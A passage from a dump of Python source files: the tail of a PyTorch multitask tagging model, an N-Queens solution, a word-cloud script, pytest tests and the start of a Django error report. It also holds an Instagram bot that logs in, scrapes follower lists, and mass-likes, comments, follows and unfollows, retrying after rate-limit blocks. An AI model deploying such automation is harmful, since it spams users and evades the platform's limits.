Recurrent( \\\r\n input_size = self.rnn_input_size, \r\n output_size = self.rnn_hidden_size, \r\n type_ = self.rnn_type,\r\n num_layers = self.rnn_num_layers, \r\n bias = self.rnn_bias, \r\n batch_first = self.rnn_batch_first, \r\n bidirectional = self.rnn_bidirectional,\r\n stateful = self.rnn_stateful, \r\n dropout_input = 0.0, \r\n dropout_output = self.rnn_dropout,\r\n layer_norm = self.rnn_layer_norm,\r\n )\r\n self.rnn_out_size = self.rnn.output_size\r\n \r\n \r\n # Indicator\r\n self.add_module('indicator_attn', MultitaskAttention( \\\r\n events = self.events, \r\n entity = INDICATOR, \r\n num_tags = self.num_tags, \r\n embed_size = self.rnn_out_size, \r\n vector_size = self.rnn_out_size,\r\n type_ = self.attn_type,\r\n dropout = self.attn_dropout))\r\n\r\n\r\n # Trigger\r\n self.add_module('trigger_crf', MultitaskCRF( \\\r\n events = self.events, \r\n entity = TRIGGER, \r\n num_tags = self.num_tags, \r\n embed_size = self.rnn_out_size,\r\n constraints = self.crf_constraints,\r\n include_start_end_transitions = \\\r\n self.crf_include_start_end_transitions))\r\n \r\n # Status\r\n self.add_module('status_crf', MultitaskCRF( \\\r\n events = self.events, \r\n entity = STATUS_SPAN, \r\n num_tags = self.num_tags, \r\n embed_size = self.rnn_out_size,\r\n constraints = self.crf_constraints,\r\n include_start_end_transitions = \\\r\n self.crf_include_start_end_transitions))\r\n\r\n \r\n #Status\r\n embed_size = self.rnn_out_size + \\\r\n self.num_tags[self.events[0]][INDICATOR]*len(self.events)\r\n self.add_module('status_attn', MultitaskAttention( \\\r\n events = self.events, \r\n entity = STATUS, \r\n num_tags = self.num_tags, \r\n embed_size = embed_size, \r\n vector_size = embed_size,\r\n dropout = self.attn_dropout))\r\n # Sequence tags\r\n embed_size = self.rnn_out_size + \\\r\n self.num_tags[self.events[0]][STATUS]*len(self.events)\r\n self.add_module('seq_tags_crf', MultitaskCRF( \\\r\n events = self.events, \r\n entity = SEQ_TAGS, \r\n num_tags = self.num_tags, \r\n embed_size = embed_size,\r\n constraints = self.crf_constraints,\r\n include_start_end_transitions = \\\r\n self.crf_include_start_end_transitions))\r\n\r\n\r\n\r\n\r\n\r\n def forward(self, X, y=None, mask=None, training=True):\r\n\r\n # Initialize dictionary for outputs\r\n y_pred = {}\r\n loss = {}\r\n \r\n # Embedding layer\r\n if self.use_bert:\r\n embedded = X\r\n else:\r\n embedded = self.word_embed_matrix(X) \r\n embedded = self.word_embed_drop_layer(embedded)\r\n \r\n '''\r\n Recurrent layer with normalization\r\n '''\r\n # Recurrent layer\r\n encoder_out = self.rnn_encoder( \\\r\n inputs = embedded, \r\n mask = mask, \r\n hidden_state = None)\r\n \r\n seq_len = X.size()[1]\r\n \r\n # Layer normalization\r\n encoder_out = self.layer_norm(encoder_out)\r\n \r\n \r\n '''\r\n Indicator\r\n '''\r\n # Indicator\r\n alphas_ind, y_prob_ind, y_pred_ind, loss_ind = \\\r\n self.indicator_attn( \\\r\n X = encoder_out, \r\n y = y, \r\n mask = mask)\r\n merge_entities(loss, loss_ind, INDICATOR)\r\n merge_entities(y_pred, y_pred_ind, INDICATOR)\r\n\r\n\r\n '''\r\n Trigger\r\n '''\r\n # Sequence tag prediction\r\n y_pred_trig, loss_trig = self.trigger_crf( \\\r\n X = encoder_out, \r\n y = y, \r\n mask = mask,\r\n training = training)\r\n merge_entities(loss, loss_trig, TRIGGER)\r\n merge_entities(y_pred, y_pred_trig, TRIGGER) \r\n\r\n '''\r\n Status span\r\n '''\r\n # Sequence tag prediction\r\n y_pred_stat_sp, loss_stat_sp = self.status_crf( \\\r\n X = encoder_out, \r\n y = y, \r\n mask = mask,\r\n training = training)\r\n merge_entities(loss, loss_stat_sp, STATUS_SPAN)\r\n merge_entities(y_pred, y_pred_stat_sp, STATUS_SPAN) \r\n\r\n\r\n\r\n \r\n '''\r\n Status\r\n ''' \r\n # Status input prep\r\n y_prob_ind = dict_sent_to_seq_feat(y_prob_ind, seq_len).detach()\r\n X_status = torch.cat((encoder_out, y_prob_ind), 2)\r\n \r\n # Status prediction\r\n alphas_stat, y_prob_stat, y_pred_stat, loss_stat = \\\r\n self.status_attn( \\\r\n X = X_status, \r\n y = y, \r\n mask = mask)\r\n merge_entities(loss, loss_stat, STATUS)\r\n merge_entities(y_pred, y_pred_stat, STATUS) \r\n \r\n '''\r\n Sequence tags\r\n '''\r\n # Sequence tags input prep\r\n y_prob_stat = dict_sent_to_seq_feat(y_prob_stat, seq_len).detach()\r\n X_seq = torch.cat((encoder_out, y_prob_stat), 2)\r\n \r\n # Sequence tag prediction\r\n y_pred_seq, loss_seq = self.seq_tags_crf( \\\r\n X = X_seq, \r\n y = y, \r\n mask = mask,\r\n training = training)\r\n merge_entities(loss, loss_seq, SEQ_TAGS)\r\n merge_entities(y_pred, y_pred_seq, SEQ_TAGS) \r\n \r\n return (loss, y_pred)\r\n\r\n\r\n def fit(self, X, y):\r\n '''\r\n Train multitask model\r\n '''\r\n\r\n # Configure training mode\r\n self.train()\r\n\r\n # Print model summary\r\n self.get_summary()\r\n\r\n # Create data set\r\n dataset = MultitaskDataset( \\\r\n X = X, \r\n y = y, \r\n max_len = self.max_len, \r\n word_to_id = self.word_to_id,\r\n label_to_id = self.label_to_id)\r\n \r\n # Create data loader\r\n dataloader = data_utils.DataLoader(dataset, \\\r\n batch_size = self.batch_size, \r\n shuffle = True, \r\n num_workers = self.num_workers)\r\n\r\n # Create optimizer\r\n optimizer = optim.Adam(self.parameters(), \\\r\n lr = self.learning_rate)\r\n\r\n\r\n # Create logger\r\n if self.log_dir is not None:\r\n if self.log_subfolder:\r\n dt = datetime.now().strftime('%Y_%m_%d_%H_%M_%S')\r\n dir_ = os.path.join(self.log_dir, 'Tensorboard_{}'.format(dt))\r\n os.makedirs(dir_)\r\n else:\r\n dir_ = self.log_dir\r\n \r\n self.writer = SummaryWriter(dir_)\r\n else:\r\n self.writer = None\r\n\r\n # Loop on epochs\r\n pbar = tqdm(total=self.num_epochs)\r\n j_bat = 0\r\n for j in range(self.num_epochs):\r\n \r\n loss_entities = {entity:0 for entity in self.entities}\r\n loss_total = 0\r\n grad_orig = 0\r\n grad_clip = 0\r\n grad_norm = 0\r\n \r\n # Loop on mini-batches\r\n for i, (X_bat, y_bat, mask_bat) in enumerate(dataloader):\r\n\r\n # Reset gradients\r\n self.zero_grad()\r\n\r\n # Push data through model\r\n loss_bat, y_pred = self( \\\r\n X = X_bat, \r\n y = y_bat, \r\n mask = mask_bat,\r\n training = True) \r\n \r\n # Aggregate loss for given entity across events\r\n loss_bat_entities = {}\r\n for entity in self.entities:\r\n ls = multitask_loss(loss_bat, entity)\r\n loss_bat_entities[entity] = ls\r\n loss_entities[entity] += ls \r\n\r\n # Total loss\r\n loss_bat_tot = torch.stack([ls for _, ls in loss_bat_entities.items()]).sum() \r\n loss_total += loss_bat_tot.item()\r\n \r\n # Backprop loss\r\n loss_bat_tot.backward()\r\n\r\n # Get original maximum gradient, without clipping\r\n grad_orig = max(grad_orig, max_grad(self.parameters()))\r\n \r\n # Clip loss\r\n grad_norm += clip_grad_norm_(self.parameters(), \\\r\n self.grad_max_norm)\r\n \r\n # Get clipped maximum gradient\r\n grad_clip = max(grad_clip, max_grad(self.parameters()))\r\n \r\n # Update\r\n optimizer.step()\r\n \r\n if self.writer is not None:\r\n self.writer.add_scalar('loss_batch', loss_bat_tot, j_bat) \r\n j_bat += 1\r\n\r\n\r\n for entity in self.entities: \r\n loss_entities[entity] = loss_entities[entity]/i\r\n loss_total = loss_total/i\r\n \r\n grad_clip = grad_clip/i\r\n\r\n msg = []\r\n msg.append('epoch={}'.format(j))\r\n msg.append('{}={:.1e}'.format('Total', loss_total))\r\n for entity in self.entities:\r\n msg.append('{}={:.1e}'.format(entity, loss_entities[entity]))\r\n \r\n msg = \", \".join(msg) \r\n pbar.set_description(desc=msg)\r\n pbar.update()\r\n\r\n # https://github.com/lanpa/tensorboard-pytorch-examples/blob/master/imagenet/main.py\r\n if self.writer is not None:\r\n self.writer.add_scalar('loss_total', loss_total, j) \r\n for entity in self.entities: \r\n self.writer.add_scalar('loss_{}'.format(entity), loss_entities[entity], j)\r\n self.writer.add_scalar('max_grad_orig', grad_orig, j) \r\n self.writer.add_scalar('max_grad_clip', grad_clip, j) \r\n self.writer.add_scalar('grad_norm', grad_norm, j) \r\n \r\n pbar.close()\r\n\r\n\r\n def predict(self, X):\r\n '''\r\n Train multitask model\r\n '''\r\n\r\n # Configure training mode\r\n self.eval()\r\n\r\n # Print model summary\r\n self.get_summary()\r\n\r\n # Create data set\r\n dataset = MultitaskDataset( \\\r\n X = X, \r\n y = None, \r\n max_len = self.max_len, \r\n word_to_id = self.word_to_id,\r\n label_to_id = self.label_to_id)\r\n \r\n # Create data loader\r\n dataloader = data_utils.DataLoader(dataset, \\\r\n batch_size = self.batch_size, \r\n shuffle = False, \r\n num_workers = self.num_workers)\r\n\r\n # Loop on mini-batches\r\n pbar = tqdm(total=int(len(X)/self.batch_size))\r\n y_pred = []\r\n for i, (X_bat, mask_bat) in enumerate(dataloader):\r\n\r\n # Push data through model\r\n _, y_pred_bat = self( \\\r\n X = X_bat, \r\n y = None, \r\n mask = mask_bat,\r\n training = False) \r\n \r\n # Post process predicitons\r\n y_pred_bat = postprocess_y(y_pred_bat, self.id_to_label)\r\n\r\n # Accumulate predictions\r\n y_pred.extend(y_pred_bat)\r\n \r\n pbar.update()\r\n pbar.close()\r\n\r\n return y_pred\r\n\r\n def get_summary(self):\r\n \r\n # Print model summary\r\n logging.info(\"\\n\")\r\n logging.info(\"Model summary\")\r\n logging.info(self)\r\n \r\n # Print trainable parameters\r\n logging.info(\"\\n\")\r\n logging.info(\"Trainable parameters\")\r\n for name, param in self.named_parameters():\r\n if param.requires_grad:\r\n logging.info('\\t{}\\t{}'.format(name, param.size()))\r\n \r\n logging.info(\"\\n\")\r\n num_p = sum(p.numel() for p in self.parameters() \\\r\n if p.requires_grad)\r\n num_pM = num_p/1e6\r\n logging.info(\"Total trainable parameters:\\t{:.1f} M\".format(num_pM))\r\n logging.info(\"\\n\")","sub_path":"code/pytorch_models/multitask/multitask_model_pre_rework.py","file_name":"multitask_model_pre_rework.py","file_ext":"py","file_size_in_byte":22025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"293237475","text":"class Solution(object):\n def __init__(self):\n self.count = 0\n\n def totalNQueens(self, n):\n \"\"\"\n :type n: int\n :rtype: int\n \"\"\"\n def helper(sol, row):\n if row == len(sol):\n self.count += 1\n return\n for i in range(len(sol)):\n sol[row] = i\n if valid(sol, row):\n helper(sol, row + 1)\n \n def valid(sol, row):\n for i in range(row):\n if sol[i] == sol[row] or abs(sol[i] - sol[row]) == row - i:\n return False\n return True\n \n sol = [0 for i in range(n)]\n helper(sol, 0)\n return self.count\n","sub_path":"python_solutions/52-n-queens-ii.py","file_name":"52-n-queens-ii.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"314208206","text":"import time, requests, json, re\n\nclass Insta():\n def __init__(self, username, password):\n self.insta_status = 'unknow'\n self.username = username\n self.password = password\n self.last_follow_time=0\n self.last_unfollow_time = 0\n self.last_comment_time = 0\n self.last_like_time=0\n self.likes_count=0\n self.comments_count=0\n self.already_liked=[]\n self.like_paused_to =0\n self.ses = requests.Session()\n self.ses.headers = {'user-agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko',\n 'Connection': 'keep-alive',\n 'Cache-Control': 'max-age=0',\n 'Accept-Encoding': 'gzip, deflate, sdch, br',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n 'Accept-Language': 'en-US,en;q=0.5',\n 'origin': 'https://www.instagram.com',\n 'Referer': 'https://www.instagram.com',\n 'Host': 'www.instagram.com'\n }\n\n def login(self):\n param = {'username': self.username, 'password': self.password}\n\n response = self.ses.get('https://www.instagram.com', timeout=10)\n\n self.csrftoken = response.cookies.get_dict()['csrftoken']\n self.ses.headers.update({'x-csrftoken': str(self.csrftoken)})\n\n response = self.ses.post('https://www.instagram.com/accounts/login/ajax/', data=param, timeout=10)\n if response.status_code == requests.codes.ok:\n #print(response.text)\n r=json.loads(response.text)\n if r['authenticated']!=True:\n self.insta_status = 'False authenticated'\n print('False authentcated')\n return False\n response = self.ses.get('https://www.instagram.com/', timeout=10)\n # print(response.text)\n print('Logged as', self.username)\n self.insta_status = 'ok'\n response = self.ses.get('https://www.instagram.com/'+self.username+'?__a=1', timeout=10)\n try:\n r = json.loads(response.text)\n except json.decoder.JSONDecodeError:\n # print(response.text)\n print(response.status_code)\n\n #print(r)\n self.user_id=r['user']['id']\n self.user_followed_by=r['user']['followed_by']['count']\n self.user_follows=r['user']['follows']['count']\n self.user_media_count= r['user']['media']['count']\n\n self.csrftoken = response.cookies.get_dict().get('csrftoken', self.csrftoken)\n self.ses.headers.update({'x-csrftoken': str(self.csrftoken)})\n # print(response.cookies.get_dict())\n return True\n elif response.status_code == 400:\n r = json.loads(response.text)\n if r['message']=='checkpoint_required':\n self.insta_status='checkpoint required'\n print(\"CHECKPOINT\")\n print(r)\n return False\n else:\n print(response.status_code, response.text)\n print('Login Error')\n return False\n\n def get_query(self,url,params={}):\n url = 'https://www.instagram.com/' + url\n while True:\n try:\n response = self.ses.get( url, params=params, timeout=10)\n except requests.exceptions.RequestException as e:\n print(e)\n time.sleep(15)\n continue\n\n self.csrftoken = response.cookies.get_dict().get('csrftoken', self.csrftoken)\n self.ses.headers.update({'x-csrftoken': str(self.csrftoken)})\n try:\n r = json.loads(response.text)\n except json.decoder.JSONDecodeError:\n if re.search('Sorry, something went wrong', response.text):\n print('Sorry, something went wrong')\n time.sleep(15)\n continue\n elif re.search('5xx Server Error', response.text):\n print('5xx Server Error')\n time.sleep(15)\n continue\n else:\n print('JD get error')\n print(response.text)\n print(response.status_code)\n break\n break\n\n\n # print(json.dumps(r, indent=4))\n return r\n\n\n def post_query(self,t,url,params={} ):\n self.ses.headers.update(\n {'Accept': '*/*', 'Content-Type': 'application/x-www-form-urlencoded'})\n self.ses.headers.update({'x-requested-with': 'XMLHttpRequest', 'x-instagram-ajax': '1'})\n\n error_count=0\n url='https://www.instagram.com/'+url\n while True:\n if error_count>=3:\n print('Too many error')\n return False\n\n try:\n if t=='post':\n response = self.ses.post(url,data=params, timeout=10)\n elif t=='get':\n response = self.ses.get(url, params=params, timeout=10)\n except requests.exceptions.RequestException as e:\n print('POST QUERY',e)\n time.sleep(60)\n error_count += 1\n continue\n cs = response.cookies.get_dict().get('csrftoken', None)\n if cs:\n self.csrftoken = cs\n cs=response.cookies.get_dict().get('csrftoken', self.csrftoken)\n self.ses.headers.update({'x-csrftoken': str(self.csrftoken)})\n if response.status_code == 400:\n if re.search('been blocked from using', response.text):\n\n self.like_paused_to=1\n return False\n else:\n print('Probably deleted', response.text)\n return False\n elif response.status_code == 404:\n print('404 error', response.status_code, url, params)\n return False\n elif response.status_code != requests.codes.ok:\n if re.search('Sorry, too many requests. Please try again later.', response.text):\n print(response.status_code, 'Too many requests, wait 180 sec')\n time.sleep(180)\n error_count+=1\n continue\n elif re.search('temporarily blocked', response.text):\n print(response.status_code, response.text, 'temporarily blocked')\n time.sleep(60 * 60)\n return None\n\n try:\n r = json.loads(response.text)\n except:\n if re.search('Sorry, something went wrong', response.text):\n print('Sorry, something went wrong')\n time.sleep(15)\n error_count += 1\n continue\n elif re.search('5xx Server Error', response.text):\n print('5xx Server Error')\n time.sleep(15)\n error_count += 1\n continue\n else:\n print('Json Decode error',response.status_code, url,params )\n print(response.text)\n print('sleep 15 sec')\n time.sleep(15)\n error_count += 1\n continue\n if r.get('status',False):\n if r['status'] == 'fail':\n print(r)\n time.sleep(180)\n continue\n\n\n break\n\n return r\n st = r['status']\n\n def get_user_id_from_username(self,username):\n r=self.post_query('get',str(username)+'/?__a=1')\n if r and r.get('user',False) and r['user'].get('id',False):\n return r['user']['id']\n return None\n\n def get_user_followers(self,username):\n user_id = self.get_user_id_from_username(username)\n if user_id:\n nodes=self.get_followers( user_id)\n return list(map(lambda x: x['username'],nodes))\n return None\n\n def get_user_followings(self, username):\n user_id = self.get_user_id_from_username(username)\n if user_id:\n nodes = self.get_followings(user_id)\n return list(map(lambda x: x['username'], nodes))\n return None\n\n def get_followers(self, user_id):\n params={}\n params['ref']='relationships::follow_list'\n p='first('\n nodes=[]\n while True:\n params['q']='ig_user('+str(user_id)+'){followed_by.'+p+'50){count,page_info{end_cursor,has_next_page},nodes{id,followed_by_viewer,requested_by_viewer,username}}}'\n r=self.post_query('post','query/',params)\n r = r['followed_by']\n # print(r)\n # print(len(r['nodes']))\n nodes+=r['nodes']\n if not r['page_info']['has_next_page']:\n break\n p='after('+r['page_info']['end_cursor']+','\n # print(len(nodes))\n return nodes\n\n def get_followings(self, user_id):\n params={}\n params['ref']='relationships::follow_list'\n p='first('\n nodes=[]\n while True:\n params['q']='ig_user('+str(user_id)+'){follows.'+p+'50){count,page_info{end_cursor,has_next_page},nodes{id,followed_by_viewer,requested_by_viewer,username}}}'\n r=self.post_query('post','query/',params)\n if not r.get('follows',False):\n print('Not follows',r)\n return []\n r = r['follows']\n # print(r)\n # print(len(r['nodes']))\n nodes+=r['nodes']\n if not r['page_info']['has_next_page']:\n break\n p='after('+r['page_info']['end_cursor']+','\n # print(len(nodes))\n return nodes\n\n def get_user_posts(self, username):\n user_id=self.get_user_id_from_username(username)\n if user_id:\n params = {}\n params['ref'] = 'users::show'\n p='first('\n nodes=[]\n while True:\n params['q']='ig_user('+str(user_id)+'){media.'+p+'50){count,page_info{end_cursor,has_next_page},nodes{id,date, code}}}'\n r=self.post_query('post','query/',params)\n\n if not r.get('media', False):\n print('NO MEDIA',r)\n return []\n nodes+= r['media']['nodes']\n break # only first page\n if not r['media']['page_info']['has_next_page']:\n break\n if not r['media']['page_info']['end_cursor']:\n break\n try:\n p='after('+r['media']['page_info']['end_cursor']+','\n except:\n print(r)\n exit()\n return list(map(lambda x: x['code'], nodes))\n return None\n\n def get_commenters_from_post(self,post_code):\n users_list=[]\n r = self.post_query('get', 'p/' +post_code+'/?__a=1')\n if r and r.get('media',False) and r['media'].get('comments',False) and r['media']['comments'].get('nodes',False):\n for n in r['media']['comments']['nodes']:\n users_list.append(n['user']['username'])\n return users_list\n return None\n\n def get_likers_from_post(self,post_code):\n users_list=[]\n r = self.post_query('get', 'p/' +post_code+'/?__a=1')\n if r and r.get('media',False) and r['media'].get('likes',False) and r['media']['likes'].get('nodes',False):\n for n in r['media']['likes']['nodes']:\n users_list.append(n['user']['username'])\n return users_list\n return None\n\n def like_count(self,user_id):\n params = {}\n params['ref'] = 'users::show'\n\n p='first('\n nodes=[]\n while True:\n params['q']='ig_user('+str(user_id)+'){media.'+p+'50){count,page_info{end_cursor,has_next_page},nodes{id,comments{count},likes{count}}}}'\n r=self.post_query('post','query/',params)\n if not r.get('media', False):\n print('NO MEDIA',r)\n return 0,0\n nodes+= r['media']['nodes']\n # print(r)\n # print(len(r['nodes']))\n\n if not r['media']['page_info']['has_next_page']:\n break\n p='after('+r['media']['page_info']['end_cursor']+','\n # print(len(nodes))\n likes=0\n comments=0\n for node in nodes:\n likes+=node['likes']['count']\n comments+=node['comments']['count']\n print('Media:',len(nodes),' Likes:', likes,' Comments:',comments)\n self.likes_count = likes\n self.comments_count = comments\n return likes,comments\n\n def like(self, post_id):\n if post_id in self.already_liked:\n print('Already liked')\n return False\n\n r = self.post_query('post','web/likes/' + str(post_id) + '/like/')\n if r:\n st = r['status']\n\n if st == 'ok':\n self.already_liked.append(post_id)\n return True\n #print('Like error',r)\n return False\n\n def dislike(self, post_id):\n self.ses.headers.update(\n {'Accept': '*/*', 'x-compress': 'null', 'Content-Type': 'application/x-www-form-urlencoded'})\n self.ses.headers.update({'x-requested-with': 'XMLHttpRequest', 'x-instagram-ajax': '1'})\n\n r = self.post_query('post','web/likes/' + str(post_id) + '/unlike/')\n st = r['status']\n if st == 'ok':\n return True\n\n return False\n\n def add_comment(self, post_id, text):\n self.ses.headers.update(\n {'Accept': '*/*', 'x-compress': 'null', 'Content-Type': 'application/x-www-form-urlencoded'})\n self.ses.headers.update({'x-requested-with': 'XMLHttpRequest', 'x-instagram-ajax': '1'})\n\n params = {'comment_text': str(text)}\n\n r = self.post_query('post','web/comments/' + str(post_id) + '/add/', params)\n if r:\n st=r['status']\n if st == 'ok':\n # self.ses.headers.update( { 'Content-Type': 'application/json'})\n # response = self.ses.post('https://www.instagram.com/ajax/bz', timeout=10)\n\n return True\n\n return False\n\n def explore_tag(self, hashtag):\n hashtag=hashtag.lower().strip(' ')\n param = {'__a': '1'}\n self.ses.headers.update({'accept': '*/*'})\n self.ses.headers.update({'x-requested-with': 'XMLHttpRequest'})\n\n r=self.post_query('get','explore/tags/' + hashtag + '/', param)\n return r\n\n def explore_location(self, place):\n param = {'__a': '1'}\n self.ses.headers.update({'accept': '*/*'})\n self.ses.headers.update({'x-requested-with': 'XMLHttpRequest'})\n r= self.post_query('get','explore/locations/' + str(place) + '/', param)\n return r\n\n def topsearch_place(self,name):\n r=self.post_query('get','web/search/topsearch/?context=place&query='+name)\n if r:\n return r['places']\n else:\n return None\n\n def follow(self,user_id):\n r= self.post_query('post','web/friendships/' + str(user_id) + '/follow/')\n if r:\n st = r['status']\n if st == 'ok':\n return True\n\n return False\n\n def unfollow(self, user_id):\n r=self.post_query('post','web/friendships/'+str(user_id)+'/unfollow/')\n if r:\n st = r['status']\n if st == 'ok':\n return True\n else:\n print('UNFOLLOW STATUS NOT OK', r, user_id)\n return False\n\n # def __repr__(self):\n # return self.username\n\n# Probably deleted {\"message\": \"This account can't be followed right now.\", \"status\": \"fail\"}\n","sub_path":"socialtune/instagr.py","file_name":"instagr.py","file_ext":"py","file_size_in_byte":16005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"198139880","text":"from wordcloud import WordCloud, STOPWORDS\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\ndf = pd.read_csv(r\"tweet_csv/test_pre.csv\", encoding =\"ISO-8859-1\")\ncomments= ' '\nstopwords = set(STOPWORDS)\n\n#wordcloud visuals for neg_tweets\nneg_tweets = df[df.pred == 0]\nneg_string = []\nfor t in neg_tweets.sentimenttext:\n neg_string.append(t)\nneg_string = pd.Series(neg_string).str.cat(sep=' ')\n\nwordcloud = WordCloud(width = 800, height = 800,\n background_color ='white',\n stopwords = stopwords,\n min_font_size = 10).generate(neg_string)\n\n# plot WordCloud image\nplt.figure(figsize = (8, 8), facecolor = None)\nplt.imshow(wordcloud)\nplt.axis(\"off\")\nplt.tight_layout(pad = 0)\nplt.show()\n","sub_path":"neg_wc.py","file_name":"neg_wc.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"642314906","text":"\"\"\"Tests the ``remove`` plugin.\"\"\"\n\nimport argparse\nfrom unittest.mock import Mock\n\nimport pytest\n\nimport moe\nfrom moe.core.library.album import Album\nfrom moe.core.library.extra import Extra\nfrom moe.core.library.session import session_scope\nfrom moe.core.library.track import Track\nfrom moe.plugins import remove\n\n\nclass TestParseArgs:\n \"\"\"Test the plugin argument parser.\"\"\"\n\n def test_track(self, tmp_session, mock_track):\n \"\"\"Tracks are removed from the database with valid query.\"\"\"\n args = argparse.Namespace(query=\"*\", album=False, extra=False)\n tmp_session.add(mock_track)\n\n remove._parse_args(config=Mock(), session=tmp_session, args=args)\n\n assert not tmp_session.query(Track).scalar()\n\n def test_album(self, tmp_session, mock_album):\n \"\"\"Albums are removed from the database with valid query.\"\"\"\n args = argparse.Namespace(query=\"*\", album=True, extra=False)\n tmp_session.merge(mock_album)\n\n remove._parse_args(config=Mock(), session=tmp_session, args=args)\n\n assert not tmp_session.query(Album).scalar()\n\n def test_extra(self, tmp_session, real_album):\n \"\"\"Extras are removed from the database with valid query.\n\n ``mock_album`` isn't working with this test. Likely something to do with\n the Extra primary key ``_filename`` and how we are mocking filesytem paths.\n \"\"\"\n args = argparse.Namespace(query=\"*\", album=False, extra=True)\n tmp_session.merge(real_album)\n assert real_album.extras\n\n remove._parse_args(config=Mock(), session=tmp_session, args=args)\n\n assert not tmp_session.query(Extra).scalar()\n\n def test_album_tracks(self, tmp_session, mock_album):\n \"\"\"Removing an album should also remove all of its tracks.\"\"\"\n args = argparse.Namespace(query=\"*\", album=True, extra=False)\n tmp_session.merge(mock_album)\n\n remove._parse_args(config=Mock(), session=tmp_session, args=args)\n\n assert not tmp_session.query(Track).scalar()\n\n def test_album_extras(self, tmp_session, mock_album):\n \"\"\"Removing an album should also remove all of its extras.\"\"\"\n args = argparse.Namespace(query=\"*\", album=True, extra=False)\n tmp_session.merge(mock_album)\n\n assert mock_album.extras\n remove._parse_args(config=Mock(), session=tmp_session, args=args)\n\n assert not tmp_session.query(Extra).scalar()\n\n def test_exit_code(self):\n \"\"\"Return a non-zero exit code if no items are removed.\"\"\"\n args = argparse.Namespace(query=\"bad\", album=False, extra=False)\n\n with pytest.raises(SystemExit) as error:\n remove._parse_args(config=Mock(), session=Mock(), args=args)\n\n assert error.value.code != 0\n\n\n@pytest.mark.integration\nclass TestCommand:\n \"\"\"Test cli integration with the remove command.\"\"\"\n\n def test_parse_args(self, real_track, tmp_path, tmp_config):\n \"\"\"Music is removed from the library when the `remove` command is invoked.\"\"\"\n cli_args = [\"remove\", \"*\"]\n config = tmp_config(settings='default_plugins = [\"remove\"]')\n config.init_db()\n with session_scope() as session:\n session.add(real_track)\n\n moe.cli.main(cli_args, config)\n\n with session_scope() as session2:\n assert not session2.query(Track).scalar()\n","sub_path":"tests/test_remove.py","file_name":"test_remove.py","file_ext":"py","file_size_in_byte":3356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"24609716","text":"from datetime import datetime\nimport re\nfrom django.contrib import messages\nfrom django.core.mail.message import EmailMessage\nfrom django.urls import reverse\nfrom django.db import transaction\nfrom django.db.models.aggregates import Count\nfrom django.http.response import Http404\nfrom django.shortcuts import redirect\nfrom django.template.loader import render_to_string\nfrom django.utils.decorators import method_decorator\nfrom django.utils.translation import ugettext_noop as _\nfrom corehq.apps.domain.decorators import require_superuser\nfrom corehq.apps.hqwebapp.views import BasePageView\nfrom corehq.apps.hqpillow_retry.filters import PillowErrorFilter\nfrom corehq.apps.reports.datatables import DataTablesHeader, DataTablesColumn\nfrom corehq.apps.reports.dispatcher import AdminReportDispatcher\nfrom corehq.apps.reports.generic import GenericTabularReport, GetParamsMixin\nfrom corehq.apps.reports.standard import DatespanMixin\nfrom dimagi.utils.decorators.memoized import memoized\nfrom dimagi.utils.parsing import json_format_date\nfrom dimagi.utils.web import get_url_base\nfrom pillow_retry.models import PillowError\nfrom django.conf import settings\nfrom django.contrib.humanize.templatetags.humanize import naturaltime\n\nSOURCE_SINGLE = 'single'\nACTION_RESET = 'reset'\nACTION_DELETE = 'delete'\nACTION_SEND = 'send'\nACTIONS = [ACTION_RESET, ACTION_DELETE, ACTION_SEND]\n\n\ndef safe_format_date(date):\n return json_format_date(date) if date else date\n\n\nclass PillowErrorsReport(GenericTabularReport, DatespanMixin, GetParamsMixin):\n dispatcher = AdminReportDispatcher\n slug = 'pillow_errors'\n name = _('PillowTop Errors')\n section_name = _(\"ADMINREPORT\")\n asynchronous = False\n ajax_pagination = True\n base_template = 'reports/base_template.html'\n needs_filters = False\n\n fields = (\n 'corehq.apps.hqpillow_retry.filters.PillowErrorFilter',\n )\n\n report_template_path = 'hqpillow_retry/pillow_errors.html'\n\n @property\n def headers(self):\n return DataTablesHeader(\n DataTablesColumn('Error', sortable=False),\n DataTablesColumn('Pillow Class', sortable=True),\n DataTablesColumn('Created', sortable=True),\n DataTablesColumn('Next attempt', sortable=True),\n DataTablesColumn('Attempts (current / total)', sortable=True),\n DataTablesColumn('Error type', sortable=True),\n DataTablesColumn('Doc type', sortable=False),\n DataTablesColumn('Domain', sortable=False),\n DataTablesColumn('Select', sortable=False),\n )\n\n @property\n @memoized\n def pillow_error_filter(self):\n return PillowErrorFilter(self.request, None)\n\n @property\n @memoized\n def pillow_error_vals(self):\n return {item['slug']: item['value'] for item in self.pillow_error_filter.GET_values}\n\n @property\n def pillow(self):\n return self.pillow_error_vals.get('pillow')\n\n @property\n def error(self):\n return self.pillow_error_vals.get('error')\n\n @property\n def sort_descending(self):\n return self.request.GET.get('sSortDir_0', 'asc') == 'desc'\n\n @property\n def sort_field(self):\n sort_fields = [\n 'pillow',\n 'date_created',\n 'date_next_attempt',\n 'current_attempt',\n 'error_type'\n ]\n sort_index = int(self.request.GET.get('iSortCol_0', 2))\n sort_index = 1 if sort_index == 0 else sort_index - 1\n field = sort_fields[sort_index]\n return field if not self.sort_descending else '-{0}'.format(field)\n\n @property\n def shared_pagination_GET_params(self):\n return self.pillow_error_filter.shared_pagination_GET_params\n\n @property\n def total_records(self):\n query = self.get_query()\n return query.aggregate(Count('id'))['id__count']\n\n def get_query(self):\n query = PillowError.objects\n if self.pillow:\n query = query.filter(pillow=self.pillow)\n if self.error:\n query = query.filter(error_type=self.error)\n\n return query\n\n @property\n def rows(self):\n query = self.get_query()\n query = query.order_by(self.sort_field)\n\n next_deploy = _('Next Deploy')\n errors = query[self.pagination.start:(self.pagination.start+self.pagination.count)]\n for error in errors:\n metadata = error.change_metadata or {}\n yield [\n self.make_search_link(error),\n error.pillow.split('.')[-1],\n naturaltime(error.date_created),\n 